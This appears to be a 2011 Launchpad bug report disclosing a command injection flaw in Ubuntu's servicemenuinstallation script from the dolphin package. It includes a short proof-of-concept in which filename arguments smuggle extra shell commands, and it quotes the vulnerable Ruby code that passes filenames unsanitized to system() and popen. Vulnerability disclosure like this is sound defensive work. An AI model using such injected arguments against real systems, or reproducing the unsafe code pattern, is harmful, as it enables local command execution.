Ubuntu
dolphin package

command injection in servicemenuinstallation

Bug #782832 reported by Emanuel Bronshtein on 2011-05-14

This bug affects 1 person

Affects		Status	Importance	Assigned to	Milestone
	dolphin (Ubuntu)	New	Undecided	Unassigned

Bug Description

Binary package hint: dolphin

/usr/bin/servicemenuinstallation have command injection bug.
in ubuntu 10.04 the file exist inside kdebase-bin package.
in ubuntu 11.04 the file exist inside dolphin package.

test case :
emanuel@emanuel-desktop:/tmp$ touch a
emanuel@emanuel-desktop:/tmp$ /usr/bin/servicemenuinstallation "a;echo SystemInj>&2;#"
SystemInj
emanuel@emanuel-desktop:/tmp$ tar -cf a.tar a
emanuel@emanuel-desktop:/tmp$ /usr/bin/servicemenuinstallation "a.tar;echo SystemInj>&2;exit 1;#"
SystemInj
SystemInj

the bug can be found at :

archive = ARGV[0]
exit(-1) if !uncompress(archive, dir)

def uncompress(filename, output)
system(sprintf($archivetypes[mimeType(filename)].to_s, filename, output))
end

def mimeType(filename)
IO.popen("file --mime-type -b " + filename).gets().strip!()
end

Report a bug

This report contains Public information

Everyone can see this information.

You are

Subscribing...

Edit bug mail

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.

Ubuntudolphin package

command injection in servicemenuinstallation

Bug Description

Other bug subscribers

Remote bug watches

Ubuntu
dolphin package